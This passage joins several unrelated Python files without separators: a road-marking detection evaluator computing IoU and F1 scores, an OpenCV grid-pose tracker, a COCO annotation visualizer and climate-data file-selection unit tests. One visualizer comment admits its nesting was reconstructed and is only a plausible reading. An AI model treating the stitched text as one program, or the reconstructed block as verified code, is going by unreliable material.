        float: IoU in [0, 1]; 0.0 when the union area is zero
        (both polygons degenerate).
    """
    polygon1_shape = Polygon(pol_1)
    polygon2_shape = Polygon(pol_2)

    # BUGFIX: the original used ``~(shape.is_valid)`` -- bitwise NOT on a
    # bool is always truthy (~True == -2, ~False == -1), so the check never
    # worked as intended.  ``buffer(0)`` repairs self-intersecting polygons.
    if not polygon1_shape.is_valid:
        polygon1_shape = polygon1_shape.buffer(0)
    if not polygon2_shape.is_valid:
        polygon2_shape = polygon2_shape.buffer(0)

    # Calculate intersection and union, and return IoU
    polygon_intersection = polygon1_shape.intersection(polygon2_shape).area
    polygon_union = (polygon1_shape.area + polygon2_shape.area
                     - polygon_intersection)
    # Guard against division by zero for degenerate polygons.
    if polygon_union == 0:
        return 0.0
    return polygon_intersection / polygon_union


def match_gt_with_pred(gt_polygons, pred_polygons, iou_threshold):
    """Greedily match ground-truth polygons to predictions.

    A prediction is assigned to a ground truth when their IoU exceeds
    ``iou_threshold``, the labels match, and the prediction has not been
    assigned already.  Among candidates the highest-IoU prediction wins.

    Args:
        gt_polygons: list of dicts with 'points' and 'label' keys.
        pred_polygons: list of dicts with 'points' and 'label' keys.
        iou_threshold (float): minimum IoU to count a match.

    Returns:
        dict: maps '<gt_label>*<gt_index>' to
        {'label_pred': '<pred_label>*<pred_index>' or None, 'iou': float}.
    """
    candidate_dict_gt = {}
    assigned_predictions = []

    # Iterate over ground truth
    for idx_gt, gt_itm in enumerate(gt_polygons):
        pts_gt = gt_itm['points']
        label_gt = gt_itm['label']
        gt_candidate = {'label_pred': None, 'iou': 0}
        assigned_prediction = None

        # Iterate over predictions, keeping the best unassigned match
        for idx_pred, pred_itm in enumerate(pred_polygons):
            pts_pred = pred_itm['points']
            label_pred = pred_itm['label']
            iou = get_IoU(pts_pred, pts_gt)

            if (iou > iou_threshold) and (gt_candidate['iou'] < iou) \
                    and (label_gt == label_pred) \
                    and str(idx_pred) not in assigned_predictions:
                gt_candidate['label_pred'] = label_pred + '*' + str(idx_pred)
                gt_candidate['iou'] = iou
                assigned_prediction = str(idx_pred)

        if assigned_prediction is not None:
            assigned_predictions.append(assigned_prediction)
        candidate_dict_gt[label_gt + '*' + str(idx_gt)] = gt_candidate

    return candidate_dict_gt


def eval_detections(gt_dir, pred_dir, iou_threshold=0.3):
    """Evaluate road-marking detections against ground truth.

    Prints class-wise and scenario-wise precision/recall/F1 tables plus
    overall and macro F1 scores.

    Args:
        gt_dir (str): directory of ground truth json files.
        pred_dir (str): directory of prediction json files (same names).
        iou_threshold (float): IoU above which a prediction counts as a
            true positive.

    Raises:
        AssertionError: if the two directories hold different numbers of
            json files.
    """
    gt_json_count = len([f for f in listdir(gt_dir) if f.endswith('.json')])
    pred_json_count = len([f for f in listdir(pred_dir) if f.endswith('.json')])

    assert gt_json_count == pred_json_count, "Ground truth json file count does not match with prediction json file count"
    print("Evaluating road marking detection performance on " + str(gt_json_count) + " files")
    print()

    classwise_results = [['Class', 'Precision', 'Recall', 'F1_Score']]
    scenariowise_results = [['Category', 'Precision', 'Recall', 'F1_Score']]

    filenames = [f for f in listdir(gt_dir) if f.endswith('.json')]

    sigma_tp = 0
    sigma_fp = 0
    sigma_fn = 0

    tp_class_dict = class_dict.copy()
    gt_class_dict = class_dict.copy()
    pred_class_dict = class_dict.copy()

    tp_scenario_dict = scene_dict.copy()
    gt_scenario_dict = scene_dict.copy()
    pred_scenario_dict = scene_dict.copy()

    # Iterate over each file, accumulating TP/FP/FN totals
    for file in filenames:

        # Load ground truth json file (with-blocks close handles on error)
        with open(gt_dir + '/' + file) as gt:
            gt_json = json.load(gt)

        # Load pred json file
        with open(pred_dir + '/' + file) as pred:
            pred_json = json.load(pred)

        gt_polygons = gt_json['shapes']
        pred_polygons = pred_json['shapes']
        scenario = gt_json['category']

        for polygon in gt_polygons:
            gt_class_dict[polygon['label']] += 1
            gt_scenario_dict[scenario] += 1

        for polygon in pred_polygons:
            pred_class_dict[polygon['label']] += 1
            pred_scenario_dict[scenario] += 1

        tp_gt = 0
        candidate_dict_gt = match_gt_with_pred(gt_polygons, pred_polygons,
                                               iou_threshold)

        for idx, lab in enumerate(candidate_dict_gt):
            label = lab.split('*')[0]
            pred_lab = candidate_dict_gt[lab]['label_pred']
            if pred_lab != None:
                tp_gt += 1
                tp_class_dict[label] += 1
                tp_scenario_dict[scenario] += 1

        tp = tp_gt
        fp = len(pred_polygons) - tp
        fn = len(gt_polygons) - tp

        sigma_tp += tp
        sigma_fp += fp
        sigma_fn += fn

    # Calculate precision, recall and F1 for the whole dataset
    if (sigma_tp + sigma_fp) != 0:
        precision = sigma_tp / (sigma_tp + sigma_fp)
    else:
        precision = 0

    if (sigma_tp + sigma_fn) != 0:
        recall = sigma_tp / (sigma_tp + sigma_fn)
    else:
        recall = 0

    if (precision + recall) != 0:
        F1_score = (2 * precision * recall) / (precision + recall)
    else:
        F1_score = 0

    class_F1_scores_list = []

    # Calculate class-wise performance metrics
    for label in tp_class_dict:
        l_tp = tp_class_dict[label]
        l_fp = pred_class_dict[label] - l_tp
        l_fn = gt_class_dict[label] - l_tp

        if (l_tp + l_fp) != 0:
            l_precision = l_tp / (l_tp + l_fp)
        else:
            l_precision = 0

        if (l_tp + l_fn) != 0:
            l_recall = l_tp / (l_tp + l_fn)
        else:
            l_recall = 0

        if (l_precision + l_recall) != 0:
            l_F1_score = (2 * l_precision * l_recall) / (l_precision + l_recall)
        else:
            l_F1_score = 0

        classwise_results.append([label, round(l_precision, 4),
                                  round(l_recall, 4), round(l_F1_score, 4)])
        class_F1_scores_list.append(l_F1_score)

    # Calculate scenario-wise performance metrics
    for scene in tp_scenario_dict:
        s_tp = tp_scenario_dict[scene]
        s_fp = pred_scenario_dict[scene] - s_tp
        s_fn = gt_scenario_dict[scene] - s_tp

        if (s_tp + s_fp) != 0:
            s_precision = s_tp / (s_tp + s_fp)
        else:
            s_precision = 0

        if (s_tp + s_fn) != 0:
            s_recall = s_tp / (s_tp + s_fn)
        else:
            s_recall = 0

        if (s_precision + s_recall) != 0:
            s_F1_score = (2 * s_precision * s_recall) / (s_precision + s_recall)
        else:
            s_F1_score = 0

        scenariowise_results.append([scene, round(s_precision, 4),
                                     round(s_recall, 4), round(s_F1_score, 4)])

    # Macro F1: unweighted mean over the fixed set of classes
    macro_F1_score = sum(class_F1_scores_list) / len(class_F1_scores_list)

    print('Class-wise road marking detection results')
    print(tabulate(classwise_results, headers='firstrow', tablefmt='grid'))
    print()

    print('Scenario-wise road marking detection results')
    print(tabulate(scenariowise_results, headers='firstrow', tablefmt='grid'))
    print()

    print("Overall Precision : " + str(round(precision, 4)))
    print("Overall Recall    : " + str(round(recall, 4)))
    print("Overall F1-Score  : " + str(round(F1_score, 4)))
    print("Macro F1-Score    : " + str(round(macro_F1_score, 4)))


def parse_opt():
    """Parse command-line options for the evaluation script."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--gt_dir', type=str,
                        help='Filepath containing ground truth json files')
    parser.add_argument('--pred_dir', type=str,
                        help='Filepath containing prediction json files')
    parser.add_argument('--iou_threshold', type=float, default=0.3,
                        help='IoU threshold to count a prediction as a true positive')
    opt = parser.parse_args()
    return opt


if __name__ == "__main__":
    opt = parse_opt()
    eval_detections(opt.gt_dir, opt.pred_dir, opt.iou_threshold)
"""A function to track a grid and display its origin on the screen
"""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import cv2
import numpy as np
import camera
import json

# Termination criteria for cv2.cornerSubPix refinement.
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)


class GridLocation(object):
    """Gets the location of a grid in an image and builds display images.

    Attributes:
        space: A float describing the spacing of the grid in mm
        rows: An int describing the number of rows of interior corners on
            the grid being tracked.
        cols: An int describing the number of columns of interior corners
            on the grid being tracked.
        opencv_windows_open: A boolean, whether the openCV display windows
            are open
        image: numpy.ndarray of the undistorted image
        result_image: numpy.ndarray of the final image, which is
            undistorted, has grid corners drawn on it, and has the grid
            coordinates drawn on it.
        object_point: numpy.ndarray of the real world coordinates of the
            grid in the grid's own coordinate system.
        axis: numpy.ndarry of the axis line points to draw, relative to the
            grid origin in the grid's coordinate system.
        intrinsic: A numpy array of the camera intrinsic matrix
        distortion: A numpy array of the camera distortion parameters
    """

    def __init__(self, calibration, rows, cols, space, cam_name):
        """Initialize the GridLocation class.

        Reads in camera calibration info, sets up communications with the
        camera, and sets up the definition for an object point.

        Args:
            calibration (str): String of the file location of the camera
                calibration data. The data should be stored as a JSON file
                with top level fields `intrinsic` which holds the intrinsic
                matrix as a list of lists and `distortion` which holds the
                distortion matrix as a list
            rows (int): The number of rows of interior corners on the grid
            cols (int): The number of columns of interior corners on the grid
            space (float): The spacing of corners on the grid
            cam_name (str): Name passed through to camera.Camera

        Raises:
            ValueError: The number of rows and cols was the same
        """
        # From args:
        self.space = space
        if rows == cols:
            # Asymmetric grids are required so the pose is unambiguous.
            raise ValueError('The grid mus be asymmetric. Rows cannot equal '
                             'Columns')
        self.rows = rows
        self.cols = cols
        self.opencv_windows_open = False
        self.image = None
        self.result_image = None

        # Grid Info: planar grid of (cols*rows) points, z == 0
        self.object_point = np.zeros((self.cols * self.rows, 3), np.float32)
        self.object_point[:, :2] = (np.mgrid[
                                    0:(self.rows*self.space):self.space,
                                    0:(self.cols*self.space):self.space]
                                    .T.reshape(-1, 2))
        # Three axis endpoints, 3 grid-squares long (z drawn negative so it
        # points out of the board toward the camera).
        self.axis = np.float32([[3*self.space, 0, 0],
                                [0, 3*self.space, 0],
                                [0, 0, -3*self.space]]).reshape(-1, 3)

        # Calibration Data setup:
        with open(calibration, 'r') as calibration_file:
            calibration_dictionary = json.load(calibration_file)
        self.intrinsic = np.asarray(calibration_dictionary['intrinsic'])
        self.distortion = np.asarray(calibration_dictionary['distortion'])

        # Camera
        self.cam = camera.Camera(cam_name, self.intrinsic, self.distortion)
        print("done with init")

    def close(self):
        """Release the display window and the camera.

        Idempotent: safe to call more than once (the original code
        destroyed the window unconditionally, which errors when called
        both from ``__exit__`` and again from garbage collection).
        """
        if self.opencv_windows_open:
            cv2.destroyWindow('result')
            self.opencv_windows_open = False
        cam = getattr(self, 'cam', None)
        if cam is not None:
            # camera.Camera exposes no close() here; its __del__ performs
            # the release -- TODO confirm against the camera module.
            cam.__del__()
            self.cam = None

    def __del__(self):
        """Destroy this instance of the GridLocation class.

        Closes any open OpenCV windows and closes the communications with
        the camera.
        """
        self.close()

    def show_images(self):
        """Displays the images.

        If the windows have not yet been created, they are created. Note,
        there is a programmed 5 ms delay to allow the images to be shown.
        """
        # OpenCV window and image setup:
        if not self.opencv_windows_open:
            cv2.namedWindow('result', cv2.WINDOW_NORMAL)
            self.opencv_windows_open = True
            cv2.waitKey(1)
        if self.result_image is not None:
            cv2.imshow('result', self.result_image)
        cv2.waitKey(5)

    def get_cam2grid(self):
        """Extract grid information from image and generate result image.

        Extract translation and rotation of grid from camera. Draw grid
        corners on result image. Draw grid pose on result image. Return
        camera to grid transformation matrix.

        Returns:
            6 member list, translation matrix (tx, ty, tz, rx, ry, rz)

        Raises:
            RuntimeError: Could not find a grid
        """
        # Get new image
        self.image = self.cam.capture_image()

        # Find chessboard corners.  findChessboardCorners returns a
        # found-flag and the corner array (the original mislabelled the
        # flag ``re_projection_error``).
        found, corners = cv2.findChessboardCorners(
            self.image, (self.rows, self.cols),
            flags=cv2.CALIB_CB_FAST_CHECK + cv2.CALIB_CB_ADAPTIVE_THRESH)

        if not found:
            raise RuntimeError('unable to find grid')

        # Refine corner locations to sub-pixel accuracy.
        corners2 = cv2.cornerSubPix(self.image, corners, (11, 11), (-1, -1),
                                    criteria)
        if corners2 is None:
            corners2 = corners

        # Find the rotation and translation vectors.
        rvecs, tvecs, inliers = cv2.solvePnPRansac(self.object_point,
                                                   corners2,
                                                   self.intrinsic,
                                                   self.distortion)

        # project 3D axis points to image plane
        image_points, jac = cv2.projectPoints(self.axis, rvecs, tvecs,
                                              self.intrinsic,
                                              self.distortion)

        self.result_image = cv2.cvtColor(self.image, cv2.COLOR_GRAY2RGB)
        temp_image = cv2.drawChessboardCorners(self.result_image,
                                               (self.cols, self.rows),
                                               corners2,
                                               found)
        # OpenCV 2 vs 3: OpenCV 3 returns the image, OpenCV 2 draws in place
        if temp_image is not None:
            self.result_image = temp_image
        self.result_image = draw_axes(self.result_image, corners2,
                                      image_points)

        return (np.concatenate((tvecs, rvecs), axis=0)).ravel().tolist()

    def __enter__(self):
        """Content manager entry point"""
        return self

    def __exit__(self, *_):
        """Content manager exit point"""
        self.close()


def draw_axes(image_raw, corners, image_points, label=''):
    """Draw axes on an image

    Draw axes which will be centered at the first corner and oriented by
    the image points. Basic code from: http://docs.opencv.org/3.0-beta/doc/
    py_tutorials/py_calib3d/py_pose/py_pose.html

    Args:
        image_raw (numpy.ndarray): The image on which to draw the axes
        corners (numpy.ndarray): An array of 2D points on the image in
            which the first point is the origin of the axes to draw
        image_points (np.array): 2D points on the image at the end of the
            three axes
        label (str): A string label to place near the coordinate frame

    Returns:
        numpy.ndarray Image with the axes drawn on it.
    """
    corners = np.rint(corners).astype('int')
    image_points = np.rint(image_points).astype('int')
    corner = tuple(corners[0].ravel())
    image = image_raw.copy()
    temp = cv2.arrowedLine(image, corner, tuple(image_points[0].ravel()),
                           (255, 0, 0), 5)
    if temp is not None:
        image = temp
    letters = np.array(image_points)
    letter_space = 30
    for row in range(letters.shape[0]):
        if letters[row][0][0] < corner[0]:
            letters[row][0][0] -= letter_space
        if letters[row][0][1] < corner[1]:
            letters[row][0][1] -= letter_space
        else:
            # BUGFIX: the original added the float 1.5*letter_space in
            # place into an int array, which raises under NumPy's
            # same-kind casting rule; cast to int first.
            letters[row][0][1] += int(1.5 * letter_space)
    temp = cv2.putText(image, "x", tuple(letters[0].ravel()),
                       cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 0, 0), 4)
    if temp is not None:
        image = temp
    temp = cv2.arrowedLine(image, corner, tuple(image_points[1].ravel()),
                           (0, 255, 0), 5)
    if temp is not None:
        image = temp
    temp = cv2.putText(image, "y", tuple(letters[1].ravel()),
                       cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 4)
    if temp is not None:
        image = temp
    temp = cv2.arrowedLine(image, corner, tuple(image_points[2].ravel()),
                           (0, 0, 255), 5)
    if temp is not None:
        image = temp
    temp = cv2.putText(image, "z", tuple(letters[2].ravel()),
                       cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 4)
    if temp is not None:
        image = temp
    # put below the axes in the middle:
    temp = cv2.putText(image, label, corner,
                       cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
    if temp is not None:
        image = temp
    return image
from emd_with_classes.utils import Iterator
from matplotlib import pyplot as plt
import cv2
import numpy as np
from matplotlib.patches import Polygon
from .dataset import Dataset


class Visualizer:
    """Interactive viewer for the annotations of a COCO-style :class:`Dataset`.

    Each ``visualize_*`` method builds a list of image paths, then hands an
    inner ``show_image`` callback to :class:`Iterator`, which calls it back
    with ``(image_path, index)`` as the user steps through the images.
    Segmentation polygons are drawn when ``dataset.is_segmentation`` is set
    and the annotations carry a ``segmentation`` key; otherwise bounding
    boxes are drawn.

    NOTE(review): this block was reconstructed from whitespace-flattened
    source; statement nesting inside the plotting loops (notably the
    ``ax.text`` calls) is the most plausible reading — confirm against the
    original file.
    """

    def __init__(self, dataset_coco: Dataset):
        # Dataset wrapper exposing the pycocotools handle as `coco_lib`
        # plus id/name lookup helpers used below.
        self.dataset = dataset_coco

    def visualize_annotations(self, categories=None):
        """Iterate over dataset images, drawing annotations of `categories`.

        Args:
            categories: Optional list of category names. When None, all
                dataset categories (and all images) are shown.
        """

        def show_image(image_path, index):
            # Callback invoked by Iterator for each displayed image.
            # Reads `images`, `colors` and `category_ids` from the
            # enclosing method scope (closure).
            im_id = images[index]["id"]
            print("Image with id:{}".format(im_id))
            plt.figure(figsize=(10, 10))
            img = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)
            plt.imshow(img)
            annIds = self.dataset.coco_lib.getAnnIds(imgIds=[im_id])
            anns = self.dataset.coco_lib.loadAnns(annIds)
            # NOTE(review): loadAnns is called a second time here; the
            # first result is discarded — the comprehension below could
            # filter `anns` instead of re-fetching.
            anns = [ann for ann in self.dataset.coco_lib.loadAnns(annIds)
                    if ann["category_id"] in category_ids]
            if len(anns) == 0:
                # No matching annotations: show the bare image.
                plt.show()
                return 0
            if self.dataset.is_segmentation and 'segmentation' in anns[0]:
                ax = plt.gca()
                for ann in anns:
                    cat = self.dataset.get_category_name_from_id(ann['category_id'])
                    color = colors[cat]
                    seg_points = ann["segmentation"]
                    for pol in seg_points:
                        # COCO stores polygons as flat [x0, y0, x1, y1, ...];
                        # re-pair into (x, y) vertices.
                        poly = [[float(pol[i]), float(pol[i + 1])]
                                for i in range(0, len(pol), 2)]
                        np_poly = np.array(poly)
                        ax.add_patch(
                            Polygon(np_poly, linestyle='--', fill=False,
                                    facecolor='none', edgecolor=color, linewidth=2))
                    # Label placed at the first vertex of the first polygon.
                    ax.text(x=seg_points[0][0], y=seg_points[0][1],
                            s=ann['category_id'], color='white', fontsize=9,
                            horizontalalignment='left', verticalalignment='top',
                            bbox=dict(facecolor=color))
                plt.imshow(img)
                plt.axis('off')
                plt.show()
            else:
                ax = plt.gca()
                for ann in anns:
                    cat = self.dataset.get_category_name_from_id(ann['category_id'])
                    color = colors[cat]
                    [bbox_x, bbox_y, bbox_w, bbox_h] = ann['bbox']
                    # Four corners of the axis-aligned bounding box.
                    poly = [[bbox_x, bbox_y], [bbox_x, bbox_y + bbox_h],
                            [bbox_x + bbox_w, bbox_y + bbox_h],
                            [bbox_x + bbox_w, bbox_y]]
                    np_poly = np.array(poly).reshape((4, 2))
                    # NOTE(review): `c` is computed but never used — the patch
                    # uses the per-category `color` instead.
                    c = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0]
                    ax.add_patch(Polygon(np_poly, linestyle='--',
                                         facecolor='none', edgecolor=color,
                                         linewidth=3))
                plt.show()

        if categories is None:
            # Default: every category and every image in the dataset.
            categories = self.dataset.get_categories_names()
            images = self.dataset.get_images_id_with_path()
        else:
            images = []
            for cat in categories:
                ii = self.dataset.get_images_id_with_path_for_category(cat)
                images.extend(ii)
        # Deduplicate paths while preserving order (images may repeat
        # across categories).
        paths = []
        for img in images:
            if not img["path"] in paths:
                paths.append(img["path"])
        # One random (light-ish) RGB colour per category, reused by the
        # closure above; also collect the category ids used for filtering.
        colors = {}
        category_ids = []
        for c in categories:
            colors[c] = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0]
            category_ids.append(self.dataset.get_category_id_from_name(c))
        iterator = Iterator(paths, show_name=False,
                            image_display_function=show_image)
        iterator.start_iteration()

    def visualize_annotations_for_property(self, meta_annotation, meta_annotation_value):
        """Show only annotations whose `meta_annotation` field equals
        `meta_annotation_value` (e.g. a custom per-annotation attribute).
        """

        def show_image(image_path, index):
            # Same drawing logic as visualize_annotations, but filtered on
            # the meta-annotation value instead of category ids.
            im_id = images[index]["id"]
            print("Image with id:{}".format(im_id))
            plt.figure(figsize=(10, 10))
            img = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)
            plt.imshow(img)
            annIds = self.dataset.coco_lib.getAnnIds(imgIds=[im_id])
            anns = self.dataset.coco_lib.loadAnns(annIds)
            # NOTE(review): redundant second loadAnns call (see
            # visualize_annotations).
            anns = [ann for ann in self.dataset.coco_lib.loadAnns(annIds)
                    if ann[meta_annotation] == meta_annotation_value]
            if len(anns) == 0:
                plt.show()
                return 0
            if self.dataset.is_segmentation and 'segmentation' in anns[0]:
                ax = plt.gca()
                for ann in anns:
                    cat = self.dataset.get_category_name_from_id(ann['category_id'])
                    color = colors[cat]
                    seg_points = ann["segmentation"]
                    for pol in seg_points:
                        poly = [[float(pol[i]), float(pol[i + 1])]
                                for i in range(0, len(pol), 2)]
                        np_poly = np.array(poly)
                        ax.add_patch(
                            Polygon(np_poly, linestyle='--', fill=False,
                                    facecolor='none', edgecolor=color, linewidth=2))
                    ax.text(x=seg_points[0][0], y=seg_points[0][1],
                            s=ann['category_id'], color='white', fontsize=9,
                            horizontalalignment='left', verticalalignment='top',
                            bbox=dict(facecolor=color))
                plt.imshow(img)
                plt.axis('off')
                plt.show()
            else:
                ax = plt.gca()
                for ann in anns:
                    cat = self.dataset.get_category_name_from_id(ann['category_id'])
                    color = colors[cat]
                    [bbox_x, bbox_y, bbox_w, bbox_h] = ann['bbox']
                    poly = [[bbox_x, bbox_y], [bbox_x, bbox_y + bbox_h],
                            [bbox_x + bbox_w, bbox_y + bbox_h],
                            [bbox_x + bbox_w, bbox_y]]
                    np_poly = np.array(poly).reshape((4, 2))
                    # NOTE(review): `c` unused, as in visualize_annotations.
                    c = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0]
                    ax.add_patch(Polygon(np_poly, linestyle='--',
                                         facecolor='none', edgecolor=color,
                                         linewidth=3))
                plt.show()

        images = self.dataset.get_images_id_with_path_with_property_value(
            meta_annotation, meta_annotation_value)
        colors = {}
        category_ids = []
        categories = self.dataset.get_categories_names()
        for c in categories:
            colors[c] = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0]
            category_ids.append(self.dataset.get_category_id_from_name(c))
        paths = [img["path"] for img in images]
        iterator = Iterator(paths, show_name=False,
                            image_display_function=show_image)
        iterator.start_iteration()

    def visualize_annotations_for_class_for_property(self, category, meta_annotation, meta_annotation_value):
        """Show annotations of one `category` filtered on a meta-annotation
        value; a single random colour is used for every drawn annotation.
        """

        def show_image(image_path, index):
            im_id = images[index]["id"]
            print("Image with id:{}".format(im_id))
            plt.figure(figsize=(10, 10))
            img = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)
            plt.imshow(img)
            # Restrict the annotation query to the requested category.
            category_id = self.dataset.get_category_id_from_name(category)
            annIds = self.dataset.coco_lib.getAnnIds(imgIds=[im_id],
                                                     catIds=[category_id])
            anns = [ann for ann in self.dataset.coco_lib.loadAnns(annIds)
                    if ann[meta_annotation] == meta_annotation_value]
            if len(anns) == 0:
                plt.show()
                return 0
            if self.dataset.is_segmentation and 'segmentation' in anns[0]:
                ax = plt.gca()
                for ann in anns:
                    seg_points = ann["segmentation"]
                    for pol in seg_points:
                        poly = [[float(pol[i]), float(pol[i + 1])]
                                for i in range(0, len(pol), 2)]
                        np_poly = np.array(poly)
                        ax.add_patch(
                            Polygon(np_poly, linestyle='--', fill=False,
                                    facecolor='none', edgecolor=color, linewidth=2))
                    ax.text(x=seg_points[0][0], y=seg_points[0][1],
                            s=ann['category_id'], color='white', fontsize=9,
                            horizontalalignment='left', verticalalignment='top',
                            bbox=dict(facecolor=color))
                plt.imshow(img)
                plt.axis('off')
                plt.show()
            else:
                ax = plt.gca()
                for ann in anns:
                    bbox_x, bbox_y, bbox_w, bbox_h = ann['bbox']
                    poly = [[bbox_x, bbox_y], [bbox_x, bbox_y + bbox_h],
                            [bbox_x + bbox_w, bbox_y + bbox_h],
                            [bbox_x + bbox_w, bbox_y]]
                    np_poly = np.array(poly).reshape((4, 2))
                    ax.add_patch(Polygon(np_poly, linestyle='--',
                                         facecolor='none', edgecolor=color,
                                         linewidth=3))
                    ax.text(x=bbox_x, y=bbox_y, s=ann['category_id'],
                            color='white', fontsize=9,
                            horizontalalignment='left', verticalalignment='top',
                            bbox=dict(facecolor=color))
                plt.axis('off')
                plt.show()

        images = self.dataset.get_images_id_with_path_for_category_with_property_value(
            category, meta_annotation, meta_annotation_value)
        # One shared colour for all annotations of this category.
        color = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0]
        paths = [img["path"] for img in images]
        iterator = Iterator(paths, show_name=False,
                            image_display_function=show_image)
        iterator.start_iteration()
# Repository: jvegreg/ESMValCore (source-extraction artifact kept as a comment).
"""Unit tests for :func:`esmvalcore._data_finder.select_files`.

Each test builds a list of CMOR-style filenames whose trailing component
encodes the covered time span, then checks that ``select_files`` keeps
exactly the files overlapping the requested ``timerange``.
"""
from esmvalcore._data_finder import select_files


def test_select_files():
    """Test file selection works for a year/year time range."""
    files = [
        "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_195501-195912.nc",
        "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196001-196412.nc",
        "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196501-196912.nc",
        "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_197001-197412.nc",
    ]
    result = select_files(files, '1962/1967')
    expected = [
        "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196001-196412.nc",
        "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196501-196912.nc",
    ]
    assert result == expected


def test_select_files_monthly_resolution():
    """Test file selection works for monthly data."""
    files = [
        "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196011-196110.nc",
        "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196111-196210.nc",
        "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196211-196310.nc",
        "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196311-196410.nc",
    ]
    result = select_files(files, '196201/196205')
    expected = [
        "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196111-196210.nc"
    ]
    assert result == expected


def test_select_files_daily_resolution():
    """Test file selection works for daily data."""
    filename = "tas_day_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_"
    files = [
        filename + "19601101-19611031.nc",
        filename + "19611101-19621031.nc",
        filename + "19621101-19631031.nc"
    ]
    result = select_files(files, '19600101/19611215')
    expected = [
        filename + "19601101-19611031.nc",
        filename + "19611101-19621031.nc",
    ]
    assert result == expected


def test_select_files_sub_daily_resolution():
    """Test file selection works for sub-daily data."""
    filename = "psl_6hrPlev_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_"
    files_no_separator = [
        filename + "196011010900-196110312100.nc",
        filename + "196111010900-196210312100.nc",
        filename + "196211010300-196310312100.nc",
    ]
    files_separator = [
        filename + "19601101T0900-19611031T2100.nc",
        filename + "19611101T0900-19621031T2100.nc",
        filename + "19621101T0300-19631031T2100.nc",
    ]
    # FIX: the original timerange read '19600101T0900/19610101T09HH00MM',
    # where 'T09HH00MM' is not a valid timestamp (apparently a format
    # placeholder merged into the literal).  The separator variant below
    # uses the intended '...T0900' end point, so this case now matches it.
    result_no_separator = select_files(
        files_no_separator, '19600101T0900/19610101T0900')
    result_separator = select_files(
        files_separator, '19600101T0900/19610101T0900')
    expected_no_separator = [
        filename + "196011010900-196110312100.nc",
    ]
    expected_separator = [
        filename + "19601101T0900-19611031T2100.nc",
    ]
    assert result_no_separator == expected_no_separator
    assert result_separator == expected_separator


def test_select_files_time_period():
    """Test file selection works with time range given as duration periods
    of various resolution."""
    filename_date = "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_"
    filename_datetime = (
        "psl_6hrPlev_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_")
    files_date = [
        filename_date + "196011-196110.nc",
        filename_date + "196111-196210.nc",
        filename_date + "196211-196310.nc",
        filename_date + "196311-196410.nc",
        filename_date + "196411-196510.nc",
    ]
    files_datetime = [
        filename_datetime + "196011010900-196110312100.nc",
        filename_datetime + "196111010900-196210312100.nc",
        filename_datetime + "196211010300-196310312100.nc",
    ]
    result_date = select_files(files_date, '196211/P2Y5M')
    result_datetime = select_files(files_datetime, '19601101T1300/P1Y0M0DT6H')
    expected_date = [
        filename_date + "196211-196310.nc",
        filename_date + "196311-196410.nc",
        filename_date + "196411-196510.nc",
    ]
    expected_datetime = [
        filename_datetime + "196011010900-196110312100.nc",
        filename_datetime + "196111010900-196210312100.nc",
    ]
    assert result_date == expected_date
    assert result_datetime == expected_datetime


def test_select_files_varying_format():
    """Test file selection works with time range of various time resolutions
    and formats."""
    filename = "psl_6hrPlev_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_"
    files = [
        filename + "196011010900-196110312100.nc",
        filename + "196111010900-196210312100.nc",
        filename + "196211010300-196310312100.nc",
    ]
    result_yearly = select_files(files, '1960/1962')
    result_monthly = select_files(files, '196011/196210')
    result_daily = select_files(files, '19601101/19601105')
    assert result_yearly == files
    assert result_monthly == files[0:2]
    assert result_daily == [files[0]]
# filename: test.py (source-extraction artifact kept as a comment).
# Unit tests for the `geom` module: points (P), lines (L), bounding
